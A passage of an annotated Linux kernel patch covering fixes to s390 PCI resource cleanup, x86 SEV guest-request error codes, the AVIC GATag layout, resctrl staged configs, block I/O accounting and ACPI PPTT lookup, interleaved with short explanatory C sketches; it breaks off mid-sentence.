+ 	bool broadcast;
+@@ -29,15 +44,6 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+ 		unsigned long asid = atomic_long_read(&mm->context.id);
+ 
+-		/*
+-		 * TLB will be immediately flushed on harts concurrently
+-		 * executing this MM context. TLB flush on other harts
+-		 * is deferred until this MM context migrates there.
+-		 */
+-		cpumask_setall(pmask);
+-		cpumask_clear_cpu(cpuid, pmask);
+-		cpumask_andnot(pmask, pmask, cmask);
+-
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
+ 		} else if (size <= stride) {
+diff --git a/arch/s390/boot/ipl_report.c b/arch/s390/boot/ipl_report.c
+index 9b14045065b6e..74b5cd2648622 100644
+--- a/arch/s390/boot/ipl_report.c
++++ b/arch/s390/boot/ipl_report.c
+@@ -57,11 +57,19 @@ repeat:
+ 	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size &&
+ 	    intersects(initrd_data.start, initrd_data.size, safe_addr, size))
+ 		safe_addr = initrd_data.start + initrd_data.size;
++	if (intersects(safe_addr, size, (unsigned long)comps, comps->len)) {
++		safe_addr = (unsigned long)comps + comps->len;
++		goto repeat;
++	}
+ 	for_each_rb_entry(comp, comps)
+ 		if (intersects(safe_addr, size, comp->addr, comp->len)) {
+ 			safe_addr = comp->addr + comp->len;
+ 			goto repeat;
+ 		}
++	if (intersects(safe_addr, size, (unsigned long)certs, certs->len)) {
++		safe_addr = (unsigned long)certs + certs->len;
++		goto repeat;
++	}
+ 	for_each_rb_entry(cert, certs)
+ 		if (intersects(safe_addr, size, cert->addr, cert->len)) {
+ 			safe_addr = cert->addr + cert->len;
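
The pattern being extended here is a restart-on-overlap scan: whenever the
candidate range collides with a reserved range, it is bumped past the
collision and the scan restarts, and the fix adds the component and
certificate list headers themselves to the ranges being avoided. A
stand-alone sketch of that loop, with invented names:

#include <stdbool.h>
#include <stdio.h>

struct range { unsigned long start, len; };

static bool intersects(unsigned long s1, unsigned long l1,
		       unsigned long s2, unsigned long l2)
{
	return s1 < s2 + l2 && s2 < s1 + l1;
}

static unsigned long find_safe_addr(unsigned long addr, unsigned long size,
				    const struct range *res, int n)
{
repeat:
	for (int i = 0; i < n; i++) {
		if (intersects(addr, size, res[i].start, res[i].len)) {
			addr = res[i].start + res[i].len;
			goto repeat;	/* earlier ranges may now overlap */
		}
	}
	return addr;
}

int main(void)
{
	const struct range reserved[] = { { 0x2000, 0x1000 }, { 0x3000, 0x1000 } };

	printf("%#lx\n", find_safe_addr(0x2800, 0x800, reserved, 2)); /* 0x4000 */
	return 0;
}
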
+diff --git a/arch/s390/pci/pci.c b/arch/s390/pci/pci.c
+index ef38b1514c77a..e16afacc8fd1b 100644
+--- a/arch/s390/pci/pci.c
++++ b/arch/s390/pci/pci.c
+@@ -544,8 +544,7 @@ static struct resource *__alloc_res(struct zpci_dev *zdev, unsigned long start,
+ 	return r;
+ }
+ 
+-int zpci_setup_bus_resources(struct zpci_dev *zdev,
+-			     struct list_head *resources)
++int zpci_setup_bus_resources(struct zpci_dev *zdev)
+ {
+ 	unsigned long addr, size, flags;
+ 	struct resource *res;
+@@ -581,7 +580,6 @@ int zpci_setup_bus_resources(struct zpci_dev *zdev,
+ 			return -ENOMEM;
+ 		}
+ 		zdev->bars[i].res = res;
+-		pci_add_resource(resources, res);
+ 	}
+ 	zdev->has_resources = 1;
+ 
+@@ -590,17 +588,23 @@ int zpci_setup_bus_resources(struct zpci_dev *zdev,
+ 
+ static void zpci_cleanup_bus_resources(struct zpci_dev *zdev)
+ {
++	struct resource *res;
+ 	int i;
+ 
++	pci_lock_rescan_remove();
+ 	for (i = 0; i < PCI_STD_NUM_BARS; i++) {
+-		if (!zdev->bars[i].size || !zdev->bars[i].res)
++		res = zdev->bars[i].res;
++		if (!res)
+ 			continue;
+ 
++		release_resource(res);
++		pci_bus_remove_resource(zdev->zbus->bus, res);
+ 		zpci_free_iomap(zdev, zdev->bars[i].map_idx);
+-		release_resource(zdev->bars[i].res);
+-		kfree(zdev->bars[i].res);
++		zdev->bars[i].res = NULL;
++		kfree(res);
+ 	}
+ 	zdev->has_resources = 0;
++	pci_unlock_rescan_remove();
+ }
+ 
+ int pcibios_device_add(struct pci_dev *pdev)
+diff --git a/arch/s390/pci/pci_bus.c b/arch/s390/pci/pci_bus.c
+index 6a8da1b742ae5..a99926af2b69a 100644
+--- a/arch/s390/pci/pci_bus.c
++++ b/arch/s390/pci/pci_bus.c
+@@ -41,9 +41,7 @@ static int zpci_nb_devices;
+  */
+ static int zpci_bus_prepare_device(struct zpci_dev *zdev)
+ {
+-	struct resource_entry *window, *n;
+-	struct resource *res;
+-	int rc;
++	int rc, i;
+ 
+ 	if (!zdev_enabled(zdev)) {
+ 		rc = zpci_enable_device(zdev);
+@@ -57,10 +55,10 @@ static int zpci_bus_prepare_device(struct zpci_dev *zdev)
+ 	}
+ 
+ 	if (!zdev->has_resources) {
+-		zpci_setup_bus_resources(zdev, &zdev->zbus->resources);
+-		resource_list_for_each_entry_safe(window, n, &zdev->zbus->resources) {
+-			res = window->res;
+-			pci_bus_add_resource(zdev->zbus->bus, res, 0);
++		zpci_setup_bus_resources(zdev);
++		for (i = 0; i < PCI_STD_NUM_BARS; i++) {
++			if (zdev->bars[i].res)
++				pci_bus_add_resource(zdev->zbus->bus, zdev->bars[i].res, 0);
+ 		}
+ 	}
+ 
+diff --git a/arch/s390/pci/pci_bus.h b/arch/s390/pci/pci_bus.h
+index e96c9860e0644..af9f0ac79a1b1 100644
+--- a/arch/s390/pci/pci_bus.h
++++ b/arch/s390/pci/pci_bus.h
+@@ -30,8 +30,7 @@ static inline void zpci_zdev_get(struct zpci_dev *zdev)
+ 
+ int zpci_alloc_domain(int domain);
+ void zpci_free_domain(int domain);
+-int zpci_setup_bus_resources(struct zpci_dev *zdev,
+-			     struct list_head *resources);
++int zpci_setup_bus_resources(struct zpci_dev *zdev);
+ 
+ static inline struct zpci_dev *zdev_from_bus(struct pci_bus *bus,
+ 					     unsigned int devfn)
+diff --git a/arch/x86/include/asm/sev-common.h b/arch/x86/include/asm/sev-common.h
+index b8357d6ecd47e..b63be696b776a 100644
+--- a/arch/x86/include/asm/sev-common.h
++++ b/arch/x86/include/asm/sev-common.h
+@@ -128,8 +128,9 @@ struct snp_psc_desc {
+ 	struct psc_entry entries[VMGEXIT_PSC_MAX_ENTRY];
+ } __packed;
+ 
+-/* Guest message request error code */
++/* Guest message request error codes */
+ #define SNP_GUEST_REQ_INVALID_LEN	BIT_ULL(32)
++#define SNP_GUEST_REQ_ERR_BUSY		BIT_ULL(33)
+ 
+ #define GHCB_MSR_TERM_REQ		0x100
+ #define GHCB_MSR_TERM_REASON_SET_POS	12
+diff --git a/arch/x86/include/asm/svm.h b/arch/x86/include/asm/svm.h
+index cb1ee53ad3b18..770dcf75eaa97 100644
+--- a/arch/x86/include/asm/svm.h
++++ b/arch/x86/include/asm/svm.h
+@@ -261,20 +261,22 @@ enum avic_ipi_failure_cause {
+ 	AVIC_IPI_FAILURE_INVALID_BACKING_PAGE,
+ };
+ 
+-#define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(9, 0)
++#define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(8, 0)
+ 
+ /*
+- * For AVIC, the max index allowed for physical APIC ID
+- * table is 0xff (255).
++ * For AVIC, the max index allowed for physical APIC ID table is 0xfe (254), as
++ * 0xff is a broadcast to all CPUs, i.e. can't be targeted individually.
+  */
+ #define AVIC_MAX_PHYSICAL_ID		0XFEULL
+ 
+ /*
+- * For x2AVIC, the max index allowed for physical APIC ID
+- * table is 0x1ff (511).
++ * For x2AVIC, the max index allowed for physical APIC ID table is 0x1ff (511).
+  */
+ #define X2AVIC_MAX_PHYSICAL_ID		0x1FFUL
+ 
++static_assert((AVIC_MAX_PHYSICAL_ID & AVIC_PHYSICAL_MAX_INDEX_MASK) == AVIC_MAX_PHYSICAL_ID);
++static_assert((X2AVIC_MAX_PHYSICAL_ID & AVIC_PHYSICAL_MAX_INDEX_MASK) == X2AVIC_MAX_PHYSICAL_ID);
++
+ #define AVIC_HPA_MASK	~((0xFFFULL << 52) | 0xFFF)
+ #define VMCB_AVIC_APIC_BAR_MASK		0xFFFFFFFFFF000ULL
+ 
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index 2c8ec5c717121..e228d58ee2645 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -2365,6 +2365,7 @@ static void mce_restart(void)
+ {
+ 	mce_timer_delete_all();
+ 	on_each_cpu(mce_cpu_restart, NULL, 1);
++	mce_schedule_work();
+ }
+ 
+ /* Toggle features for corrected errors */
+diff --git a/arch/x86/kernel/cpu/resctrl/ctrlmondata.c b/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
+index 1df0e3262bcae..bcdc679dad4e5 100644
+--- a/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
++++ b/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
+@@ -373,7 +373,6 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ {
+ 	struct resctrl_schema *s;
+ 	struct rdtgroup *rdtgrp;
+-	struct rdt_domain *dom;
+ 	struct rdt_resource *r;
+ 	char *tok, *resname;
+ 	int ret = 0;
+@@ -402,10 +401,7 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ 		goto out;
+ 	}
+ 
+-	list_for_each_entry(s, &resctrl_schema_all, list) {
+-		list_for_each_entry(dom, &s->res->domains, list)
+-			memset(dom->staged_config, 0, sizeof(dom->staged_config));
+-	}
++	rdt_staged_configs_clear();
+ 
+ 	while ((tok = strsep(&buf, "\n")) != NULL) {
+ 		resname = strim(strsep(&tok, ":"));
+@@ -450,6 +446,7 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ 	}
+ 
+ out:
++	rdt_staged_configs_clear();
+ 	rdtgroup_kn_unlock(of->kn);
+ 	cpus_read_unlock();
+ 	return ret ?: nbytes;
+diff --git a/arch/x86/kernel/cpu/resctrl/internal.h b/arch/x86/kernel/cpu/resctrl/internal.h
+index 5ebd28e6aa0ca..f43eb7340ca5f 100644
+--- a/arch/x86/kernel/cpu/resctrl/internal.h
++++ b/arch/x86/kernel/cpu/resctrl/internal.h
+@@ -527,5 +527,6 @@ bool has_busy_rmid(struct rdt_resource *r, struct rdt_domain *d);
+ void __check_limbo(struct rdt_domain *d, bool force_free);
+ void rdt_domain_reconfigure_cdp(struct rdt_resource *r);
+ void __init thread_throttle_mode_init(void);
++void rdt_staged_configs_clear(void);
+ 
+ #endif /* _ASM_X86_RESCTRL_INTERNAL_H */
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index 87b670d540b84..c7f1c7cb1963b 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -78,6 +78,19 @@ void rdt_last_cmd_printf(const char *fmt, ...)
+ 	va_end(ap);
+ }
+ 
++void rdt_staged_configs_clear(void)
++{
++	struct rdt_resource *r;
++	struct rdt_domain *dom;
++
++	lockdep_assert_held(&rdtgroup_mutex);
++
++	for_each_alloc_capable_rdt_resource(r) {
++		list_for_each_entry(dom, &r->domains, list)
++			memset(dom->staged_config, 0, sizeof(dom->staged_config));
++	}
++}
++
+ /*
+  * Trivial allocator for CLOSIDs. Since h/w only supports a small number,
+  * we can keep a bitmap of free CLOSIDs in a single integer.
+@@ -2851,7 +2864,9 @@ static int rdtgroup_init_alloc(struct rdtgroup *rdtgrp)
+ {
+ 	struct resctrl_schema *s;
+ 	struct rdt_resource *r;
+-	int ret;
++	int ret = 0;
++
++	rdt_staged_configs_clear();
+ 
+ 	list_for_each_entry(s, &resctrl_schema_all, list) {
+ 		r = s->res;
+@@ -2862,20 +2877,22 @@ static int rdtgroup_init_alloc(struct rdtgroup *rdtgrp)
+ 		} else {
+ 			ret = rdtgroup_init_cat(s, rdtgrp->closid);
+ 			if (ret < 0)
+-				return ret;
++				goto out;
+ 		}
+ 
+ 		ret = resctrl_arch_update_domains(r, rdtgrp->closid);
+ 		if (ret < 0) {
+ 			rdt_last_cmd_puts("Failed to initialize allocations\n");
+-			return ret;
++			goto out;
+ 		}
+ 
+ 	}
+ 
+ 	rdtgrp->mode = RDT_MODE_SHAREABLE;
+ 
+-	return 0;
++out:
++	rdt_staged_configs_clear();
++	return ret;
+ }
+ 
+ static int mkdir_rdt_prepare(struct kernfs_node *parent_kn,
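
The common thread of these resctrl hunks is that the staged configuration
is scratch state: it is now cleared on entry and on every exit path, so a
failed write can never leak into the next caller. A minimal stand-alone
sketch of that shape, with stub functions and invented names:

#include <stdio.h>

static void clear_staged(void) { puts("staged configs cleared"); }
static int stage_all(void)     { return -1; /* pretend parsing fails */ }
static int commit_all(void)    { return 0; }

static int schemata_write(void)
{
	int ret;

	clear_staged();			/* entry: drop stale leftovers */

	ret = stage_all();
	if (ret)
		goto out;

	ret = commit_all();
out:
	clear_staged();			/* every exit leaves it clean */
	return ret;
}

int main(void)
{
	return schemata_write() ? 1 : 0;
}
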
+diff --git a/arch/x86/kernel/ftrace_64.S b/arch/x86/kernel/ftrace_64.S
+index 1265ad519249c..fb4f1e01b64a2 100644
+--- a/arch/x86/kernel/ftrace_64.S
++++ b/arch/x86/kernel/ftrace_64.S
+@@ -136,10 +136,12 @@ SYM_TYPED_FUNC_START(ftrace_stub)
+ 	RET
+ SYM_FUNC_END(ftrace_stub)
+ 
++#ifdef CONFIG_FUNCTION_GRAPH_TRACER
+ SYM_TYPED_FUNC_START(ftrace_stub_graph)
+ 	CALL_DEPTH_ACCOUNT
+ 	RET
+ SYM_FUNC_END(ftrace_stub_graph)
++#endif
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE
+ 
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index 679026a640efd..3f664ab277c49 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -2183,9 +2183,6 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	struct ghcb *ghcb;
+ 	int ret;
+ 
+-	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+-		return -ENODEV;
+-
+ 	if (!fw_err)
+ 		return -EINVAL;
+ 
+@@ -2212,15 +2209,26 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	if (ret)
+ 		goto e_put;
+ 
+-	if (ghcb->save.sw_exit_info_2) {
+-		/* Number of expected pages are returned in RBX */
+-		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST &&
+-		    ghcb->save.sw_exit_info_2 == SNP_GUEST_REQ_INVALID_LEN)
+-			input->data_npages = ghcb_get_rbx(ghcb);
++	*fw_err = ghcb->save.sw_exit_info_2;
++	switch (*fw_err) {
++	case 0:
++		break;
+ 
+-		*fw_err = ghcb->save.sw_exit_info_2;
++	case SNP_GUEST_REQ_ERR_BUSY:
++		ret = -EAGAIN;
++		break;
+ 
++	case SNP_GUEST_REQ_INVALID_LEN:
++		/* Number of expected pages are returned in RBX */
++		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST) {
++			input->data_npages = ghcb_get_rbx(ghcb);
++			ret = -ENOSPC;
++			break;
++		}
++		fallthrough;
++	default:
+ 		ret = -EIO;
++		break;
+ 	}
+ 
+ e_put:
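
After this change snp_issue_guest_request() maps the firmware's
sw_exit_info_2 onto distinct errno values, so callers can tell a transient
busy condition from an undersized certificate buffer. A hedged sketch of
how a caller might react; the stub fakes the firmware and every name is
invented:

#include <errno.h>
#include <stdio.h>

#define MAX_TRIES 3

/* Stub standing in for the guest-request call; walks through the two
 * recoverable outcomes once each, then succeeds. */
static int issue_request(unsigned int *npages, int attempt)
{
	if (attempt == 0)
		return -EAGAIN;		/* SNP_GUEST_REQ_ERR_BUSY */
	if (attempt == 1) {
		*npages = 4;		/* SNP_GUEST_REQ_INVALID_LEN */
		return -ENOSPC;
	}
	return 0;
}

int main(void)
{
	unsigned int npages = 1;

	for (int i = 0; i < MAX_TRIES; i++) {
		int rc = issue_request(&npages, i);

		if (rc == -EAGAIN)
			continue;	/* transient: retry */
		if (rc == -ENOSPC) {
			printf("grow buffer to %u pages, retry\n", npages);
			continue;
		}
		printf("done, rc=%d\n", rc);
		return rc ? 1 : 0;
	}
	return 1;
}
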
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index 97ad0661f9639..e910ec5a0cc0b 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -27,19 +27,29 @@
+ #include "irq.h"
+ #include "svm.h"
+ 
+-/* AVIC GATAG is encoded using VM and VCPU IDs */
+-#define AVIC_VCPU_ID_BITS		8
+-#define AVIC_VCPU_ID_MASK		((1 << AVIC_VCPU_ID_BITS) - 1)
++/*
++ * Encode the arbitrary VM ID and the vCPU's default APIC ID, i.e the vCPU ID,
++ * into the GATag so that KVM can retrieve the correct vCPU from a GALog entry
++ * if an interrupt can't be delivered, e.g. because the vCPU isn't running.
++ *
++ * For the vCPU ID, use however many bits are currently allowed for the max
++ * guest physical APIC ID (limited by the size of the physical ID table), and
++ * use whatever bits remain to assign arbitrary AVIC IDs to VMs.  Note, the
++ * size of the GATag is defined by hardware (32 bits), but is an opaque value
++ * as far as hardware is concerned.
++ */
++#define AVIC_VCPU_ID_MASK		AVIC_PHYSICAL_MAX_INDEX_MASK
+ 
+-#define AVIC_VM_ID_BITS			24
+-#define AVIC_VM_ID_NR			(1 << AVIC_VM_ID_BITS)
+-#define AVIC_VM_ID_MASK			((1 << AVIC_VM_ID_BITS) - 1)
++#define AVIC_VM_ID_SHIFT		HWEIGHT32(AVIC_PHYSICAL_MAX_INDEX_MASK)
++#define AVIC_VM_ID_MASK			(GENMASK(31, AVIC_VM_ID_SHIFT) >> AVIC_VM_ID_SHIFT)
+ 
+-#define AVIC_GATAG(x, y)		(((x & AVIC_VM_ID_MASK) << AVIC_VCPU_ID_BITS) | \
++#define AVIC_GATAG(x, y)		(((x & AVIC_VM_ID_MASK) << AVIC_VM_ID_SHIFT) | \
+ 						(y & AVIC_VCPU_ID_MASK))
+-#define AVIC_GATAG_TO_VMID(x)		((x >> AVIC_VCPU_ID_BITS) & AVIC_VM_ID_MASK)
++#define AVIC_GATAG_TO_VMID(x)		((x >> AVIC_VM_ID_SHIFT) & AVIC_VM_ID_MASK)
+ #define AVIC_GATAG_TO_VCPUID(x)		(x & AVIC_VCPU_ID_MASK)
+ 
++static_assert(AVIC_GATAG(AVIC_VM_ID_MASK, AVIC_VCPU_ID_MASK) == -1u);
++
+ static bool force_avic;
+ module_param_unsafe(force_avic, bool, 0444);
+ 
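
The new GATag layout can be sanity-checked with ordinary bit arithmetic:
9 vCPU-ID bits, matching the physical ID table index mask, and the
remaining 23 bits for the VM ID, together filling exactly 32 bits. A small
self-contained recomputation; the macros are local stand-ins for the
kernel's:

#include <assert.h>
#include <stdint.h>
#include <stdio.h>

#define VCPU_ID_BITS	9	/* hweight of AVIC_PHYSICAL_MAX_INDEX_MASK */
#define VCPU_ID_MASK	((1u << VCPU_ID_BITS) - 1)
#define VM_ID_SHIFT	VCPU_ID_BITS
#define VM_ID_MASK	(0xffffffffu >> VM_ID_SHIFT)

static uint32_t gatag(uint32_t vm_id, uint32_t vcpu_id)
{
	return ((vm_id & VM_ID_MASK) << VM_ID_SHIFT) | (vcpu_id & VCPU_ID_MASK);
}

int main(void)
{
	uint32_t tag = gatag(0x1234, 0x1ff);

	assert(((tag >> VM_ID_SHIFT) & VM_ID_MASK) == 0x1234);	/* VM ID back */
	assert((tag & VCPU_ID_MASK) == 0x1ff);			/* vCPU ID back */
	/* the patch's static_assert: all-ones inputs fill all 32 bits */
	assert(gatag(VM_ID_MASK, VCPU_ID_MASK) == 0xffffffffu);
	printf("tag=%#x\n", tag);
	return 0;
}
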
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index d93c715cda6ab..bceb5ad409c63 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -3021,7 +3021,7 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 					struct vmcs12 *vmcs12,
+ 					enum vm_entry_failure_code *entry_failure_code)
+ {
+-	bool ia32e;
++	bool ia32e = !!(vmcs12->vm_entry_controls & VM_ENTRY_IA32E_MODE);
+ 
+ 	*entry_failure_code = ENTRY_FAIL_DEFAULT;
+ 
+@@ -3047,6 +3047,13 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 					   vmcs12->guest_ia32_perf_global_ctrl)))
+ 		return -EINVAL;
+ 
++	if (CC((vmcs12->guest_cr0 & (X86_CR0_PG | X86_CR0_PE)) == X86_CR0_PG))
++		return -EINVAL;
++
++	if (CC(ia32e && !(vmcs12->guest_cr4 & X86_CR4_PAE)) ||
++	    CC(ia32e && !(vmcs12->guest_cr0 & X86_CR0_PG)))
++		return -EINVAL;
++
+ 	/*
+ 	 * If the load IA32_EFER VM-entry control is 1, the following checks
+ 	 * are performed on the field for the IA32_EFER MSR:
+@@ -3058,7 +3065,6 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 	 */
+ 	if (to_vmx(vcpu)->nested.nested_run_pending &&
+ 	    (vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_EFER)) {
+-		ia32e = (vmcs12->vm_entry_controls & VM_ENTRY_IA32E_MODE) != 0;
+ 		if (CC(!kvm_valid_efer(vcpu, vmcs12->guest_ia32_efer)) ||
+ 		    CC(ia32e != !!(vmcs12->guest_ia32_efer & EFER_LMA)) ||
+ 		    CC(((vmcs12->guest_cr0 & X86_CR0_PG) &&
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index 88cccd65029db..c6efcf559d882 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -600,7 +600,8 @@ void __init sme_enable(struct boot_params *bp)
+ 	cmdline_ptr = (const char *)((u64)bp->hdr.cmd_line_ptr |
+ 				     ((u64)bp->ext_cmd_line_ptr << 32));
+ 
+-	cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer));
++	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0)
++		return;
+ 
+ 	if (!strncmp(buffer, cmdline_on, sizeof(buffer)))
+ 		sme_me_mask = me_mask;
+diff --git a/block/blk-core.c b/block/blk-core.c
+index 5a0049215ee72..597293151cd11 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -946,16 +946,11 @@ again:
+ 	}
+ }
+ 
+-unsigned long bdev_start_io_acct(struct block_device *bdev,
+-				 unsigned int sectors, enum req_op op,
++unsigned long bdev_start_io_acct(struct block_device *bdev, enum req_op op,
+ 				 unsigned long start_time)
+ {
+-	const int sgrp = op_stat_group(op);
+-
+ 	part_stat_lock();
+ 	update_io_ticks(bdev, start_time, false);
+-	part_stat_inc(bdev, ios[sgrp]);
+-	part_stat_add(bdev, sectors[sgrp], sectors);
+ 	part_stat_local_inc(bdev, in_flight[op_is_write(op)]);
+ 	part_stat_unlock();
+ 
+@@ -971,13 +966,12 @@ EXPORT_SYMBOL(bdev_start_io_acct);
+  */
+ unsigned long bio_start_io_acct(struct bio *bio)
+ {
+-	return bdev_start_io_acct(bio->bi_bdev, bio_sectors(bio),
+-				  bio_op(bio), jiffies);
++	return bdev_start_io_acct(bio->bi_bdev, bio_op(bio), jiffies);
+ }
+ EXPORT_SYMBOL_GPL(bio_start_io_acct);
+ 
+ void bdev_end_io_acct(struct block_device *bdev, enum req_op op,
+-		      unsigned long start_time)
++		      unsigned int sectors, unsigned long start_time)
+ {
+ 	const int sgrp = op_stat_group(op);
+ 	unsigned long now = READ_ONCE(jiffies);
+@@ -985,6 +979,8 @@ void bdev_end_io_acct(struct block_device *bdev, enum req_op op,
+ 
+ 	part_stat_lock();
+ 	update_io_ticks(bdev, now, true);
++	part_stat_inc(bdev, ios[sgrp]);
++	part_stat_add(bdev, sectors[sgrp], sectors);
+ 	part_stat_add(bdev, nsecs[sgrp], jiffies_to_nsecs(duration));
+ 	part_stat_local_dec(bdev, in_flight[op_is_write(op)]);
+ 	part_stat_unlock();
+@@ -994,7 +990,7 @@ EXPORT_SYMBOL(bdev_end_io_acct);
+ void bio_end_io_acct_remapped(struct bio *bio, unsigned long start_time,
+ 			      struct block_device *orig_bdev)
+ {
+-	bdev_end_io_acct(orig_bdev, bio_op(bio), start_time);
++	bdev_end_io_acct(orig_bdev, bio_op(bio), bio_sectors(bio), start_time);
+ }
+ EXPORT_SYMBOL_GPL(bio_end_io_acct_remapped);
+ 
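
The accounting split after this change: bdev_start_io_acct() only marks the
I/O in flight, and ios/sectors are charged in bdev_end_io_acct() once the
completed size is known, so an I/O that never completes no longer inflates
the counters. A toy model of the counters, illustrative only:

#include <stdio.h>

struct stats { unsigned long ios, sectors, in_flight; };

static void start_acct(struct stats *s)
{
	s->in_flight++;			/* only in-flight moves at start */
}

static void end_acct(struct stats *s, unsigned long sectors)
{
	s->ios++;			/* counted once, at completion */
	s->sectors += sectors;		/* with the final transfer size */
	s->in_flight--;
}

int main(void)
{
	struct stats st = { 0 };

	start_acct(&st);
	end_acct(&st, 8);		/* one 4 KiB I/O */
	printf("ios=%lu sectors=%lu in_flight=%lu\n",
	       st.ios, st.sectors, st.in_flight);
	return 0;
}
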
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index b9e3b558367f1..c021fb05161b9 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2743,6 +2743,7 @@ static void blk_mq_dispatch_plug_list(struct blk_plug *plug, bool from_sched)
+ 	struct blk_mq_hw_ctx *this_hctx = NULL;
+ 	struct blk_mq_ctx *this_ctx = NULL;
+ 	struct request *requeue_list = NULL;
++	struct request **requeue_lastp = &requeue_list;
+ 	unsigned int depth = 0;
+ 	LIST_HEAD(list);
+ 
+@@ -2753,10 +2754,10 @@ static void blk_mq_dispatch_plug_list(struct blk_plug *plug, bool from_sched)
+ 			this_hctx = rq->mq_hctx;
+ 			this_ctx = rq->mq_ctx;
+ 		} else if (this_hctx != rq->mq_hctx || this_ctx != rq->mq_ctx) {
+-			rq_list_add(&requeue_list, rq);
++			rq_list_add_tail(&requeue_lastp, rq);
+ 			continue;
+ 		}
+-		list_add_tail(&rq->queuelist, &list);
++		list_add(&rq->queuelist, &list);
+ 		depth++;
+ 	} while (!rq_list_empty(plug->mq_list));
+ 
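
requeue_lastp above is the classic tail-pointer idiom: keeping a pointer to
the last next-slot makes each append O(1) and, unlike pushing onto the
head, preserves submission order. A minimal demonstration with an invented
list type:

#include <stdio.h>

struct req { int id; struct req *next; };

/* Append via a pointer to the tail's next-slot: O(1) and keeps
 * submission order, which head insertion would reverse. */
static struct req **add_tail(struct req **lastp, struct req *rq)
{
	rq->next = NULL;
	*lastp = rq;
	return &rq->next;
}

int main(void)
{
	struct req a = { 1 }, b = { 2 }, c = { 3 };
	struct req *head = NULL, **lastp = &head;

	lastp = add_tail(lastp, &a);
	lastp = add_tail(lastp, &b);
	lastp = add_tail(lastp, &c);
	for (struct req *r = head; r; r = r->next)
		printf("%d ", r->id);	/* 1 2 3 */
	printf("\n");
	return 0;
}
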
+diff --git a/block/blk-mq.h b/block/blk-mq.h
+index ef59fee62780d..a7482d2cc82e7 100644
+--- a/block/blk-mq.h
++++ b/block/blk-mq.h
+@@ -378,12 +378,13 @@ static inline bool hctx_may_queue(struct blk_mq_hw_ctx *hctx,
+ #define __blk_mq_run_dispatch_ops(q, check_sleep, dispatch_ops)	\
+ do {								\
+ 	if ((q)->tag_set->flags & BLK_MQ_F_BLOCKING) {		\
++		struct blk_mq_tag_set *__tag_set = (q)->tag_set; \
+ 		int srcu_idx;					\
+ 								\
+ 		might_sleep_if(check_sleep);			\
+-		srcu_idx = srcu_read_lock((q)->tag_set->srcu);	\
++		srcu_idx = srcu_read_lock(__tag_set->srcu);	\
+ 		(dispatch_ops);					\
+-		srcu_read_unlock((q)->tag_set->srcu, srcu_idx);	\
++		srcu_read_unlock(__tag_set->srcu, srcu_idx);	\
+ 	} else {						\
+ 		rcu_read_lock();				\
+ 		(dispatch_ops);					\
+diff --git a/drivers/acpi/pptt.c b/drivers/acpi/pptt.c
+index c91342dcbcd63..ced3eb15bd8b7 100644
+--- a/drivers/acpi/pptt.c
++++ b/drivers/acpi/pptt.c
+@@ -537,16 +537,19 @@ static int topology_get_acpi_cpu_tag(struct acpi_table_header *table,
+ static struct acpi_table_header *acpi_get_pptt(void)
+ {
+ 	static struct acpi_table_header *pptt;
++	static bool is_pptt_checked;
+ 	acpi_status status;
+ 
+ 	/*
+ 	 * PPTT will be used at runtime on every CPU hotplug in path, so we
+ 	 * don't need to call acpi_put_table() to release the table mapping.
+ 	 */
+-	if (!pptt) {
++	if (!pptt && !is_pptt_checked) {
+ 		status = acpi_get_table(ACPI_SIG_PPTT, 0, &pptt);
+ 		if (ACPI_FAILURE(status))
+ 			acpi_pptt_warn_missing();
++
++		is_pptt_checked = true;
+ 	}
+ 
+ 	return pptt;
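
The is_pptt_checked flag turns a cache-if-non-NULL lookup into a once-only
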